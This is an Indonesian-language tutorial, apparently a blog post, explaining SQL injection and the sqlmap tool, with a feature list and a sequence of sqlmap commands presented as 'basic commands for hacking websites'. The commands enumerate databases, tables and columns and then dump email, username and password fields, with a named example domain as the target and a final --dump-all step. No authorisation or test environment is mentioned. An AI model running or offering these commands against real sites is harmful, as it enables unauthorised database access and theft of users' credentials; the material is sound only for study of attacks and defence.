A. SQL
INJECTION
Injeksi SQL atau
SQL Injection adalah teknik injeksi kode, yang digunakan untuk menyerang
aplikasi berbasis data, di mana pernyataan SQL jahat dimasukkan ke dalam bidang
entri untuk eksekusi (mis. Untuk membuang konten database ke penyerang).
Injeksi SQL harus mengeksploitasi kerentanan keamanan pada perangkat lunak
aplikasi, misalnya saat input pengguna salah disaring untuk karakter escape
string literal yang disematkan pada pernyataan SQL atau masukan pengguna tidak
diketik dengan kuat dan tanpa diduga dieksekusi. Injeksi SQL sebagian besar
dikenal sebagai vektor serangan untuk situs web namun dapat digunakan untuk
menyerang semua jenis database SQL. Dalam panduan ini saya akan menunjukkan
kepada Anda bagaimana SQLMAP SQL Injection di Kali Linux untuk meng-hack sebuah
situs web (lebih khusus Database) dan ekstrak nama pengguna dan kata sandi di
Kali Linux.
B. SQLMap
Sqlmap adalah alat pengujian penetrasi open
source yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL
injection dan mengambil alih dari database server. Muncul dengan mesin deteksi
yang kuat, banyak fitur ceruk untuk penetrasi tester utama dan berbagai switch
yang berlangsung dari database sidik jari, atas data mengambil dari database,
untuk mengakses sistem file yang mendasari dan mengeksekusi perintah pada
sistem operasi melalui out of-band koneksi.
1.
Fitur dari Sqlmap
·
Dukungan penuh untuk MySQL, Oracle,
PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,
Sybase, SAP MaxDB dan sistem manajemen database HSQLDB.
·
Dukungan penuh selama enam teknik SQL injection:
berbasis boolean blind, berdasarkan waktu blind, berbasis error, berbasis
permintaan UNION, query ditumpuk dan out-of-band.
·
Dukungan untuk langsung terhubung ke
database tanpa melewati melalui injeksi SQL, dengan menyediakan DBMS
kredensial, alamat IP, port dan nama database.
·
Dukungan untuk menghitung pengguna, hash
password, hak, peran, database, tabel dan kolom.
·
Pengakuan otomatis format hash sandi dan
dukungan untuk retak mereka menggunakan serangan kamus berbasis.
·
Dukungan untuk membuang tabel database
seluruhnya, berbagai entri atau kolom tertentu sesuai pilihan pengguna.
Pengguna juga dapat memilih untuk membuang hanya berbagai karakter dari entri
setiap kolom ini.
·
Dukungan untuk mencari nama database
tertentu, tabel khusus di semua database atau kolom tertentu di tabel semua
database '. Hal ini berguna, misalnya, untuk mengidentifikasi tabel yang berisi
kredensial aplikasi kustom di mana nama-nama kolom yang relevan 'mengandung
string seperti nama dan lulus.
·
Dukungan untuk men-download dan
meng-upload file dari server database yang mendasari sistem file ketika
software database MySQL, PostgreSQL atau Microsoft SQL Server.
·
Dukungan untuk mengeksekusi perintah
sewenang-wenang dan mengambil output standar mereka pada database server yang
mendasari sistem operasi ketika software database MySQL, PostgreSQL atau
Microsoft SQL Server.
·
Dukungan untuk membangun koneksi stateful
TCP out-of-band antara mesin penyerang dan sistem operasi server database yang
mendasari. Saluran ini dapat menjadi command prompt interaktif, sesi
meterpreter atau antarmuka pengguna (VNC) sesi grafis sesuai pilihan pengguna.
·
Dukungan untuk proses database 'pengguna
eskalasi hak istimewa melalui meterpreter Metasploit ini getsystem perintah.
Perintah-perintah
dasar sqlmap untuk hacking website :
Ø
sqlmap.py
-u url_target --dbs
Perintah
ini digunakan untuk mengambil semua nama database di server. Isi link target
dengan web tujuan:
Ø
sqlmap.py
-u url_target -D nama_database --tables
Perintah
ini digunakan untuk mengambil semua table dari suatu database. nama_database
isi dengan nama database yang ingin ditampilkan semua tablenya.
Ø
sqlmap.py
-u url_target -D nama_database -T nama_table --columns
Perintah
ini digunakan untuk menampilkan semua column dari sebuah table yang ada di
sebuah database server. Ganti nama tablenya sesuai dengan nama table yang ada
di database target masing-masing.
Ø
sqlmap.py
-u url_target -D nama_database -T nama_table -C nama_columns --dump
Perintah
ini digunakan untuk menampilkan isi dari semua data dari sebuah table. isi nama
nama_columns dengan kolom-kolom yang ada di table tersebut. Contoh penulisanya
seperti ini :
Ø
sqlmap.py
-u iangoblog.com/user.php?id=2 -D iangoblog -T users -C email,username,password
--dump
Tapi
kalau ingin langsung saja mengambil semua data yang ada di database servernya,
dapat langsung menuliskan perintah di bawah ini dan tinggal hanya menunggu
saja. Kecepatan tergantung dengan kecepatan internet. Perintahnya sebagai berikut
:
Ø
sqlmap.py
-u iangoblog.com/user.php?id=2 --dump-all - tekan enter
